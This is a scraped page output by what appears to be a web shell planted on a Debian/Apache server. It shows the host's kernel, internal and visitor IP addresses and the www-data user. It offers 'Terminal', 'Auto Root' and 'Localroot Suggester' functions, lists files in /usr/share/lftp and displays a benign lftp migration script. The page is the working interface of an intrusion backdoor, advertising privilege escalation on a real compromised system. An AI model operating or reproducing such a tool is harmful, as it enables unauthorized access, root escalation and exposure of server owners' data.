Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
lftp /
Delete
Unzip
Name
Size
Permission
Date
Action
convert-mozilla-cookies
1.74
KB
-rwxr-xr-x
2022-07-27 00:33
import-ncftp
621
B
-rwxr-xr-x
2022-07-27 00:33
import-netscape
857
B
-rwxr-xr-x
2022-07-27 00:33
verify-file
2.98
KB
-rwxr-xr-x
2022-07-27 00:33
xdg-move
789
B
-rwxr-xr-x
2022-07-27 00:33
Save
Rename
#!/bin/bash # # This script moves ~/.lftp (or $LFTP_HOME) files to XDG directories. # ~/.lftp should be removed after execution of this script. # src=${LFTP_HOME:-$HOME/.lftp} if ! [ -d "$src" ]; then echo "Nothing to move (no $src directory found)." >&2 exit 0 fi function move() { test -a "$src/$1" || return test -d "$2" || mkdir -p "$2" || exit 1 mv "$src/$1" "$2/" } function move_data() { move "$1" "${XDG_DATA_HOME:-$HOME/.local/share}/lftp" } function move_config() { move "$1" "${XDG_CONFIG_HOME:-$HOME/.config}/lftp" } function move_cache() { move "$1" "${XDG_CACHE_HOME:-$HOME/.cache}/lftp" } move_data bg move_data bookmarks move_data cwd_history move_cache DHT move_data log move_config rc move_data rl_history move_data transfer_log rmdir "$src"